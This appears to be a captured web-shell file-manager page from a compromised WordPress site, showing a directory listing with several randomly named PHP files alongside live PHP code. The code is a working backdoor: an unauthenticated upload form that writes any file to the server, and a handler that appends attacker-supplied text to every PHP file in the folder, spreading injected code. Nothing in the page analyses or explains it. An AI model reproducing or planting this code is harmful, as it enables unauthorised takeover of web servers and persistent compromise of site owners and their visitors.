PATH:
home
/
chassiw
/
www
<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?> <?php if (isset($_GET['bak'])) { $directory = __DIR__; $mama = $_POST['file']; $textToAppend = ' ' . $mama . ' '; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (pathinfo($file, PATHINFO_EXTENSION) === 'php') { $fileHandle = fopen($directory . '/' . $file, 'a'); fwrite($fileHandle, $textToAppend); fclose($fileHandle); echo "OK >> $file "; } } closedir($handle); } } ?>
[+]
..
[-] wp-config.php
[edit]
[-] wp-links-opml.php
[edit]
[-] .htaccess
[edit]
[-] drdmkerm.php
[edit]
[-] mfoaqjky.php
[edit]
[+]
wp-admin
[-] p.php
[edit]
[+]
wp-content
[-] robots.txt
[edit]
[-] pcnpjtxz.php
[edit]
[-] wp-trackback.php
[edit]
[-] zwuylicd.php
[edit]
[-] wp-set.php
[edit]
[-] wp-sign.php
[edit]
[-] xmlrpc.php
[edit]
[-] wp-cron.php
[edit]
[-] qarpbree.php
[edit]
[-] vcwxtscg.php
[edit]
[-] wp-signup.php
[edit]
[-] wp-comments-post.php
[edit]
[-] wp-config-sample.php
[edit]
[-] wp-activate.php
[edit]
[+]
wp-includes
[-] wp-mail.php
[edit]
[-] tnmftjpy.php
[edit]
[-] tfujkekl.php
[edit]
[-] wp-blog-header.php
[edit]